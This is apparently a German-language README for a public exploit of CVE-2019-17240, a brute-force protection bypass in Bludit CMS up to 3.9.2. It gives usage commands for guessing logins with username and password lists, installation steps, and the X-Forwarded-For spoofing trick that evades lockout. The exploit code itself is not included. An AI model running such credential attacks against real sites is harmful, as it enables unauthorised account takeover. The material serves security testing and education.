
Bludit <= 3.9.2 - Exploit/PoC zur Umgehung der Brute-Force-Schutzmaßnahmen bei der Authentifizierung
Exploit-Code für CVE-2019-17240, auch bekannt als Bludit <= 3.9.2 Bruteforce Mitigation Bypass
Exploit-Links: [ExploitDB-48942] [PacketStorm]
Erwartetes Ergebnis: Anmeldedaten ermitteln und den Brute-Force-Schutzmechanismus auf einem Host mit Bludit <=3.9.2 umgehen.
Nur für Bildungszwecke und Tests in Unternehmensumgebungen vorgesehen.
Dieser Exploit wurde mit Python 3.8.6 getestet.
cfx: ~/bludit
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERLIST] [-p PASSLIST]
Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL Path to Bludit (Example: http://127.0.0.1/admin/login.php)
-u USERLIST, --userlist USERLIST
Username Dictionary
-p PASSLIST, --passlist PASSLIST
Password Dictionary
Exploit Usage :
./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt
Installation:
pip3 install pwn
pip3 install requests
Dieser Exploit erwartet drei Benutzereingaben :
Exploit-Aufruf, bei dem der Benutzername in user.txt gegen jedes Passwort in pass.txt abgeglichen und an die Anmeldung gesendet wird:

Die Werte aus pass.txt werden in den X-Forwarded-For-Header gesendet. Wenn die Liste weniger Passwörter enthält, besteht die Möglichkeit, dass ein Wort vom Server blockiert wird. In diesem Fall zeigt das Skript das blockierte Wort in der Ausgabe an:

Bei erfolgreicher Anmeldung wird die folgende Ausgabe mit den gültigen Anmeldedaten angezeigt:

Dies ist ein Exploit für die von Rastating im Bludit CMS entdeckte Schwachstelle.
Erklärung der Schwachstelle: https://rastating.github.io/bludit-brute-force-mitigation-bypass/.